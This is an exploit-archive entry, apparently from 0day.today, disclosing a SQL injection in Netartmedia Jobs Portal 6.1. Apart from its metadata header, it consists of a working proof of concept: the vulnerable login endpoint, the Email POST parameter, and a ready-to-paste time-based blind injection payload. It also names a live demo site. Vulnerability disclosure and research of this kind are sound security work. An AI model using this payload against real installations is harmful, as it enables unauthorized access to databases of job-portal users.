id: 32390
date: 03/19/2019
title: Netartmedia Jobs Portal 6.1 - SQL Injection Vulnerability
author: Ahmet Ümit BAYRAM
cves: 

# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/jobsportal/
# Demo Site: https://www.ittjobs.com/
# Version: 6.1
# Tested on: Kali Linux
# CVE: N/A

----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

#  0day.today [2023-03-27]  #